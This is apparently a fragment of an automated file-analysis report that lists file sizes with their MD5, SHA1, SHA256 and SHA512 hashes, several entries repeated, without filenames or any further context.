SHA1f2a37a758d1dc54cd580beb657bb6ac90ec05c7c
SHA25643e3af260d945ae7e37a1ebc3e75b23d9b2787daa585dd95ef8b808e2ed31f03
SHA512d1e6fc47cbe231e8077e851093af31619ee03bfa4b3e6041402edb6c64ee5c4e6c273d55f9d922d7873611319fcaceae2716fe07ff1b89e1a39c670610e11d45
-
Filesize
133B
MD59f1cad277fed4bc2dce662ff2c735361
SHA16546ff81db20b0b73fbd0695378cd1dcb79f173b
SHA25618c7562a92da7657b72ebe1a4bb374a2de5bd629f93222c5ea0c4a502c2f7f50
SHA5127664a815597c6c65d235bc297c52f40ef4d9eb2c4eed21055a7a0d0e753255277c6685fed8c67e8e1305fad206674688fd752fec084e2e5250252705ecd0a8ad
-
Filesize
598B
MD59a65f4bccd95bd92fc55dc239d9e3c22
SHA10a990a8582bc994544abd45d51d6a4350489fc7c
SHA256040fd56e7105069da5fd56a1a88cae439abf9098cb702d01bd97fc2db5d1e83a
SHA5123b8fd112cb02b3822b51cb8daa582808dd5d5d7d426d5d350d1e2247229be36e37448e1232dd6b00afad140a996faf5084cfe2601c2b933f6961cf5ae36c0ff8
-
Filesize
4.6MB
MD5b47de0ac24fa366a872c1017aec0a309
SHA15bd1323e756a53837585f4cf71c6c6dc20100e8d
SHA2562dd6524e632524b2e1733f1a913158a8243a4c3b6671b568e683aa11922412ca
SHA5128b8ffa12768ecd46ec2e5988ba037680f7e4759ff54b9f7b84637bdb4d1438f6fbadf9f4b3adcebe73f6e6ac9e8639c7e03d4465f1013b8f37a06922ed045d51
-
Filesize
748KB
MD5d250e70b1cfa8534fbc7818f719696b4
SHA1e6ed0c53b9f7d09474b579c4e9e93c0d56a465e2
SHA2567e13a77e61c81044507c310617ecf2347d91e1c36e19f0385b7d42e38522ff3f
SHA512bfa5494e65621d41515408c710107385bd6ea3ee59de1b417b6afb15130c2fed99b1dd7aee3283a84e7117d1fd88808325b90fb942e52f4af17374c8eee78709
-
Filesize
365KB
MD5cc297a18126fd9f993dd7ac69cdea5b2
SHA12f5530465b99f66a72ec3205edb3b1d24a8d007a
SHA256b150fab1ae70e4fb95718074df46bb7096bf819ba3e70073a6df96f905706ef9
SHA5120545536eea3828ce2574189aef1825351d61c9237a8ea060ee198fbb030156e6079d71d315004b7710cfcf7befcec10f9bb742dc58ccf346296aad356f260c9f
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
154KB
MD583bcf3ad82ce65d2bd0fdd364fe32cb5
SHA132c5080bbf51dd22bed7f594a92f753a25eef73c
SHA2565635105c90c618c8db7a11cc031dbfb91aba92b0b8c960d6fb02f1fb4ff9758d
SHA512852c6176bd92c2fa4d8177764bcf8e6c9acb06cea488972376e6d6acb4e01c02f306f9b73ca36663f1c82b0443049e0898a0d6638a0760f957eade50a6ba8e81
-
Filesize
88KB
MD579ef0849ee69e6e6036b2a79548ad376
SHA163877386835960f27c194ae9b3ebd41f99e6bd8a
SHA25664bcca7996d580f41f405c5f002c5f8fcd650bee3990b56d65de88e79a8308b1
SHA512f7e83640b628c4c24eb267ad89265b4e500223284207474d997698defe482106345fcb5807d0d6414d6388837bada02cc4e320a4c486cbfd5e0ea96be05096d5
-
Filesize
88KB
MD579ef0849ee69e6e6036b2a79548ad376
SHA163877386835960f27c194ae9b3ebd41f99e6bd8a
SHA25664bcca7996d580f41f405c5f002c5f8fcd650bee3990b56d65de88e79a8308b1
SHA512f7e83640b628c4c24eb267ad89265b4e500223284207474d997698defe482106345fcb5807d0d6414d6388837bada02cc4e320a4c486cbfd5e0ea96be05096d5
-
Filesize
88KB
MD579ef0849ee69e6e6036b2a79548ad376
SHA163877386835960f27c194ae9b3ebd41f99e6bd8a
SHA25664bcca7996d580f41f405c5f002c5f8fcd650bee3990b56d65de88e79a8308b1
SHA512f7e83640b628c4c24eb267ad89265b4e500223284207474d997698defe482106345fcb5807d0d6414d6388837bada02cc4e320a4c486cbfd5e0ea96be05096d5
-
Filesize
88KB
MD579ef0849ee69e6e6036b2a79548ad376
SHA163877386835960f27c194ae9b3ebd41f99e6bd8a
SHA25664bcca7996d580f41f405c5f002c5f8fcd650bee3990b56d65de88e79a8308b1
SHA512f7e83640b628c4c24eb267ad89265b4e500223284207474d997698defe482106345fcb5807d0d6414d6388837bada02cc4e320a4c486cbfd5e0ea96be05096d5
-
Filesize
88KB
MD579ef0849ee69e6e6036b2a79548ad376
SHA163877386835960f27c194ae9b3ebd41f99e6bd8a
SHA25664bcca7996d580f41f405c5f002c5f8fcd650bee3990b56d65de88e79a8308b1
SHA512f7e83640b628c4c24eb267ad89265b4e500223284207474d997698defe482106345fcb5807d0d6414d6388837bada02cc4e320a4c486cbfd5e0ea96be05096d5
-
Filesize
11KB
MD5959ea64598b9a3e494c00e8fa793be7e
SHA140f284a3b92c2f04b1038def79579d4b3d066ee0
SHA25603cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b
SHA5125e765e090f712beffce40c5264674f430b08719940d66e3a4d4a516fd4ade859f7853f614d9d6bbb602780de54e11110d66dbb0f9ca20ef6096ede531f9f6d64
-
Filesize
11KB
MD5959ea64598b9a3e494c00e8fa793be7e
SHA140f284a3b92c2f04b1038def79579d4b3d066ee0
SHA25603cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b
SHA5125e765e090f712beffce40c5264674f430b08719940d66e3a4d4a516fd4ade859f7853f614d9d6bbb602780de54e11110d66dbb0f9ca20ef6096ede531f9f6d64
-
Filesize
260KB
MD56ae9eaa868bcb42ae79bf9701b18e7ec
SHA180bd26a403aaee21fc2b9af0d5585a768ea3acd0
SHA256d4fb435c03841d4911cba57bd01212156d4a0ab4554e5a25b3604e43b3622fb5
SHA51206c60bb27b39064c237e52d3ccea2371953fc454321eab2046ffcb5cc9771206accb0124fdf1726d5cf821906ee05e03dc7ae9ca2534f6543e585382a9c0a688
-
Filesize
11KB
MD5bf712f32249029466fa86756f5546950
SHA175ac4dc4808ac148ddd78f6b89a51afbd4091c2e
SHA2567851cb12fa4131f1fee5de390d650ef65cac561279f1cfe70ad16cc9780210af
SHA51213f69959b28416e0b8811c962a49309dca3f048a165457051a28a3eb51377dcaf99a15e86d7eee8f867a9e25ecf8c44da370ac8f530eeae7b5252eaba64b96f4
-
Filesize
11KB
MD5bf712f32249029466fa86756f5546950
SHA175ac4dc4808ac148ddd78f6b89a51afbd4091c2e
SHA2567851cb12fa4131f1fee5de390d650ef65cac561279f1cfe70ad16cc9780210af
SHA51213f69959b28416e0b8811c962a49309dca3f048a165457051a28a3eb51377dcaf99a15e86d7eee8f867a9e25ecf8c44da370ac8f530eeae7b5252eaba64b96f4
-
Filesize
262KB
MD569fcb9ae215b1397ae1f9751da7016d0
SHA1da3816591f15fcdae48910fb632ee5d2f8c09d4d
SHA256ba5b2e57997aae2ce636a76e8ffc536498bf3882d61648f30c169cc17fd1f342
SHA512f9c6aa7b420b1e18ab7e7351f4d228e5b2fd047fc70e170b037efda0bca4b5ff146f6457f477aeaecf829e42d3c730530483c240e0b1de98aef217c2bcc56689